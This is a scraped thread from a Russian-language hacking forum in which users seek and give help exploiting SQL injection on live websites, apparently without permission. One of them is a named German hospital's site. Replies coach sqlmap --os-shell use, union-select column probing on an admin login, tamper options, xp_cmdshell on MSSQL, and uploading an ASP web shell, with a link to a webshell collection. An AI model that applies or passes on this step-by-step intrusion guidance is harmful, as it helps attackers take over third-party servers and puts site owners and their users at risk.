HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2691  
Старый 06.10.2019, 21:21
karkajoi
Guest
Сообщений: n/a
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от noppathee  
noppathee said:

sqlmap с параметром --os-shell такой результат:
os-shell> whoami
do you want to retrieve the command standard output? [Y/
[11:11:38] [INFO] retrieved: nt authority\network servic
command standard output: 'nt authority\network service'
os-shell>
Подскажите нубу плз, как дальше действовать, чтобы залить шелл через sqlmap?
Нашел в теме рекомендацию от BigBear по похожему вопросу: select '' into outfile '/[full_path]/x.php';
Но как узнать конечную директорию, в которую заливаться?
Спасибо!
ну надо знать путь, команда pwd, если путь не знаешь, тогда брутом, или искать где эти пути палятся

p.s путь в ошибке бывает показывает
 
Ответить с цитированием

  #2692  
Старый 07.10.2019, 02:34
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от noppathee  
noppathee said:

sqlmap с параметром --os-shell такой результат:
os-shell> whoami
do you want to retrieve the command standard output? [Y/
[11:11:38] [INFO] retrieved: nt authority\network servic
command standard output: 'nt authority\network service'
os-shell>
Подскажите нубу плз, как дальше действовать, чтобы залить шелл через sqlmap?
Нашел в теме рекомендацию от BigBear по похожему вопросу: select '' into outfile '/[full_path]/x.php';
Но как узнать конечную директорию, в которую заливаться?
Спасибо!
sqlmap --os-shell -> 4 -> 2 итд

Цитата:
Сообщение от DezMond™  
DezMond™ said:

help!
Код:
Code:
https://www.clemenshospital.de/unternehmen/presse-und-aktuelles/pressemitteilungen/pressemitteilung/?cHash=3e1a0675b9b0455db1168f0342035939&tx_browser_pi1%5Bsort%5D=tx_browser_pi1%5Bsort%5D=a
Задетекти место инъекции

Цитата:
Сообщение от man474019  
man474019 said:

in target when try sleep() target loads and gives response 504 Gateway Time-out, also tested sleep(5), sleep(10) and etc.., same result (504)
scanners detects it sql injection, but sqlmap not
what means it vuln ? thanks in advance
p.s server is nginx
or 1=1; or 1=2; and etc
 
Ответить с цитированием

  #2693  
Старый 07.10.2019, 11:30
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию

sql иньекция в POST запросе админ панели.

В поле логин при постановке кавычки показывает сообщение:

Цитата:
Сообщение от None  
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''' LIMIT 2' at line 1
При переборе полей методом

Цитата:
Сообщение от None  
' order by 6#
показывает сообщение

Цитата:
Сообщение от None  
Unknown column '6' in 'order clause'
Если ' order by 5# то пользователь не найден

Запрос ' union select 1,2# дает результат:

Цитата:
Сообщение от None  
The used SELECT statements have a different number of columns
А ' union+select+1,2,3,4,5#

Цитата:
Сообщение от None  
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '
+select+1,2,3
' LIMIT 2' at line 1
То есть обрезается до 3 полей.

При ' union select 1,2,3,4,5#

и выводит ошибку:

Цитата:
Сообщение от None  
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''
LIMIT 2
' at line 1
Как правильно составить запрос и почему не выводится кол-во полей?

' union select 1,2,3,4,5#или ' union+select+1,2,3,4,5#?
 
Ответить с цитированием

  #2694  
Старый 08.10.2019, 15:09
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию

И в чем может проявляться проблема когда при слепой инъекции выводились данные со скрипом, а спустя сутки-двое при наличии той же уязвимости(её не закрыли) выводится

Цитата:
Сообщение от None  
[13:56:51] [ERROR] invalid character detected. retrying..
[13:58:23] [ERROR] unable to properly validate last character value ('2')..
?

Запрос

Цитата:
Сообщение от None  
--tamper=between --random-agent --time-sec=10 --delay=5 --sql-shell --hex
 
Ответить с цитированием

  #2695  
Старый 10.10.2019, 23:20
noppathee
Guest
Сообщений: n/a
Провел на форуме:
1835

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

sqlmap --os-shell -> 4 -> 2 итд


Нагуглить дальнейший метод действий не получилось. Подскажите плз, как дальше действовать или ткните в мануал какой-нибудь?

Цель: залить шелл.

Или как вариант заказал бы платную консультацию у профи, т.к. хочется понять как действовать, позадавать вопросы.

Спасибо!
 
Ответить с цитированием

  #2696  
Старый 11.10.2019, 01:08
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Ты вообще уверен что прав хватит?

если есть права,то один расклад, если нету, то другой. вообщем смотреть надо.
 
Ответить с цитированием

  #2697  
Старый 11.10.2019, 10:47
noppathee
Guest
Сообщений: n/a
Провел на форуме:
1835

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

Ты вообще уверен что прав хватит?
если есть права,то один расклад, если нету, то другой. вообщем смотреть надо.
Цитата:
Сообщение от man474019  
man474019 said:

try --current-user --is-dba
and see response true or false ? if false there're no variants for uploading shell via sqli/sqlmap
 
Ответить с цитированием

  #2698  
Старый 11.10.2019, 14:24
Baskin-Robbins
Guest
Сообщений: n/a
Провел на форуме:
92829

Репутация: 212
По умолчанию

Цитата:
Сообщение от noppathee  
noppathee said:

Нагуглить дальнейший метод действий не получилось. Подскажите плз, как дальше действовать или ткните в мануал какой-нибудь?
Давайте смотреть что мы имеем и пытаться понять как нам действовать.
  1. Слепая инъекция
  2. Ос винда
  3. Субд mssql
  4. Текущий юзер DBA
Sqlmap нам явно говорит что xp_cmdshell без вывода в строке "unable to retrieve xp_cmdshell output"

Следовательно результат выполнения команды мы увидеть не можем.

Но для начала я бы рекомендовал вам ознакомится с sql синтаксисом, проведением sql инъекций и проведением sql инъекций в mssql в частности, если вы не знакомы.

Это даст понимание того что происходит и что делать дальше. Найти это можно как в гугле так и воспользовавшись поиском на форуме, ниже линк на sql inj в mssql, ну одна из статей на форуме.

/threads/30501/

Идем дальше. Несмотря на то что вывод в данном случае отсутствует, команды все равно могут выполнятся. Самый простой способ это проверить - команда ping

и смотреть в логах вашего сервера. Или сразу лить шелл в папку доступную из вне. О том какой командой лить есть по линку выше, либо воспльзовавшись гуглом можно

найти список команд командной строки, или запустить если у вас винда cmd.exe и забить команду help.

Следующий момент - asp. Ну я думаю вы понимаете что если используется asp, то и лить надо asp шелл. Такой можно найти по линку ниже, но надо быть осторожным - есть пробэкдореные.

https://github.com/tennc/webshell

Вот примерно куда вам нужно двигаться. Ну я бы во всяком случае двигался.
 
Ответить с цитированием

  #2699  
Старый 12.10.2019, 18:20
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от noppathee  
noppathee said:


Тогда можешь выполнять системные команды. и сразу получить шелл. даже заливать ничего не надо
 
Ответить с цитированием

  #2700  
Старый 12.10.2019, 18:21
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от Baskin-Robbins  
Baskin-Robbins said:

Давайте смотреть что мы имеем и пытаться понять как нам действовать.
  1. Слепая инъекция
  2. Ос винда
  3. Субд mssql
  4. Текущий юзер DBA
Sqlmap нам явно говорит что xp_cmdshell без вывода в строке "unable to retrieve xp_cmdshell output"
Следовательно результат выполнения команды мы увидеть не можем.
Но для начала я бы рекомендовал вам ознакомится с sql синтаксисом, проведением sql инъекций и проведением sql инъекций в mssql в частности, если вы не знакомы.
Это даст понимание того что происходит и что делать дальше. Найти это можно как в гугле так и воспользовавшись поиском на форуме, ниже линк на sql inj в mssql, ну одна из статей на форуме.
/threads/30501/
Идем дальше. Несмотря на то что вывод в данном случае отсутствует, команды все равно могут выполнятся. Самый простой способ это проверить - команда ping
и смотреть в логах вашего сервера. Или сразу лить шелл в папку доступную из вне. О том какой командой лить есть по линку выше, либо воспльзовавшись гуглом можно
найти список команд командной строки, или запустить если у вас винда cmd.exe и забить команду help.
Следующий момент - asp. Ну я думаю вы понимаете что если используется asp, то и лить надо asp шелл. Такой можно найти по линку ниже, но надо быть осторожным - есть пробэкдореные.
https://github.com/tennc/webshell
Вот примерно куда вам нужно двигаться. Ну я бы во всяком случае двигался.
нам не надо получать вывод команд. Есть возможность получить шелл, и кстати вывод команд тоже можно получить
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ